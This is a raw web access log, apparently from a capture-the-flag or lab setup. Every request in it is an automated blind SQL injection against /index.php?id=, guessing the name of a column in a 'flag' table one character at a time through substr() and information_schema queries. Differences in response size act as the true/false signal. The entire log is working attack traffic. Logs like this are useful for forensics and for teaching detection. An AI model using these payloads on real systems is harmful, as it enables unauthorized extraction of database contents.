172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'r',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'q',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'p',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'o',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'n',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'm',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'l',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'k',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'j',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'i',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'h',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'g',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'f',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'e',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'd',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'c',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'b',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),3,1)%20=%20'a',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 506 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'%C2%80',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 453 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'%7F',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'~',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'%7D',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'%7C',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'%7B',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'z',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'y',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'x',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'w',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'v',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'u',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20't',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20's',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'r',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'q',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'p',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'o',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'n',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'm',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 448 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'l',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 413 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'k',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'j',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'i',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:01 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'h',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),4,1)%20=%20'g',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 506 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%C2%80',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 454 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%7F',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'~',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%7D',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%7C',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%7B',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'z',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'y',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'x',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'w',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'v',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'u',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20't',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20's',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'r',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'q',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'p',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'o',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'n',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'm',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'l',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'k',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'j',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'i',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'h',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'g',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'f',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'e',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'd',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'c',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'b',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'a',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%60',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'_',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%5E',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%5D',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%5C',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'%5B',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'Z',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'Y',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'X',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 450 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'W',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'V',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'U',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'T',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'S',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'R',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
172.17.0.1 - - [30/Jun/2024:01:44:02 +0000] "GET /index.php?id=1%20and%20if(substr((select%20column_name%20from%20information_schema.columns%20where%20table_name='flag'%20and%20table_schema='sqli'),5,1)%20=%20'Q',1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1" 200 449 "-" "python-requests/2.26.0"
